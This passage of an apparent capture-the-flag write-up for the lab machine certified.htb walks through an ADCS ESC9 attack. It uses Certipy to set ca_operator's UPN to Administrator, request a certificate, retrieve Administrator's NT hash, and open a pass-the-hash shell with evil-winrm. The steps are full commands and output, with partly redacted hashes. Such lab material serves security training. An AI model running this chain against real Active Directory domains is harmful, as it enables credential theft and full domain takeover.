- First, ca_operator's NT hash is needed. We use management_svc's GenericAll to perform a Shadow Credentials attack, which we already did in the previous step; the hash is b4b86f45c6018f1b664██████f45d8f2.
- Then, the userPrincipalName of ca_operator is changed to Administrator, which GenericAll over the account permits.
kali@kali:~$ certipy account update \
-username management_svc \
-user ca_operator \
-upn "Administrator" \
-hashes :a091██████cdd4677c28b5a6a1295584 \
-target certified.htb \
-dc-ip 10.10.11.41
Certipy v4.8.2 - by Oliver Lyak (ly4k)
[*] Updating user 'ca_operator':
userPrincipalName : Administrator
[*] Successfully updated 'ca_operator'
- The vulnerable certificate is now requested as ca_operator, whose UPN at this point is Administrator.
kali@kali:~$ certipy req -username ca_operator \
-hashes :b4b86f45c6018f1b664██████f45d8f2 \
-ca 'certified-DC01-CA' \
-template 'CertifiedAuthentication' \
-target certified.htb \
-dc-ip 10.10.11.41
Certipy v4.8.2 - by Oliver Lyak (ly4k)
[*] Requesting certificate via RPC
[*] Successfully requested certificate
[*] Request ID is 5
[*] Got certificate with UPN 'Administrator'
[*] Certificate has no object SID
[*] Saved certificate and private key to 'administrator.pfx'
- certipy reports 'Certificate has no object SID': that is the effect of NoSecurityExtension, and the reason the DC will map this certificate by its UPN. Change ca_operator's UPN back to its original value so that nothing breaks.
kali@kali:~$ certipy account update \
-username management_svc \
-hashes :a091██████cdd4677c28b5a6a1295584 \
-user ca_operator \
-upn ca_operator@certified.htb \
-target certified.htb \
-dc-ip 10.10.11.41
Certipy v4.8.2 - by Oliver Lyak (ly4k)
[*] Updating user 'ca_operator':
userPrincipalName : ca_operator@certified.htb
[*] Successfully updated 'ca_operator'
- Authenticating with the obtained certificate gets us Administrator's NT hash, since the DC resolves the certificate's UPN Administrator to the built-in Administrator account.
kali@kali:~$ certipy auth -pfx administrator.pfx -dc-ip 10.10.11.41 -domain certified.htb
Certipy v4.8.2 - by Oliver Lyak (ly4k)
[*] Using principal: administrator@certified.htb
[*] Trying to get TGT...
[*] Got TGT
[*] Saved credential cache to 'administrator.ccache'
[*] Trying to retrieve NT hash for 'administrator'
[*] Got hash for 'administrator@certified.htb': aad3b435b51404eeaad3b435b51404ee:0d5b496██████1751f708748f67e2d34
We get the NT hash for administrator@certified.htb (printed as LM:NT; the LM half aad3b435b51404eeaad3b435b51404ee is the empty-LM constant)
aad3b435b51404eeaad3b435b51404ee:0d5b496██████1751f708748f67e2d34
Using evil-winrm to get a shell as Administrator
kali@kali:~$ evil-winrm \
-u administrator -H 0d5b496██████1751f708748f67e2d34 -i 10.10.11.41
Evil-WinRM shell v3.7
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents>
Get root.txt
*Evil-WinRM* PS C:\Users\Administrator\Desktop> type root.txt
745cb4c5d361690c85f██████15c59b2
[1] Default certificate templates: https://learn.microsoft.com/en-us/windows-server/identity/ad-cs/certificate-template-concepts#default-certificate-templates
[2] Getting started with BloodHound Community Edition: https://support.bloodhoundenterprise.io/hc/en-us/articles/17715215791899-Getting-started-with-BloodHound-Community-Edition
[3] Install BloodHound Community Edition with Docker Compose: https://support.bloodhoundenterprise.io/hc/en-us/articles/17468450058267-Install-BloodHound-Community-Edition-with-Docker-Compose
[4] ESC9 - No security extension (The Hacker Recipes): https://www.thehacker.recipes/ad/movement/adcs/certificate-templates#esc9-no-security-extension
[5] ADCS Attack Paths in BloodHound, Part 3 (SpecterOps): https://posts.specterops.io/adcs-attack-paths-in-bloodhound-part-3-33efb00856ac
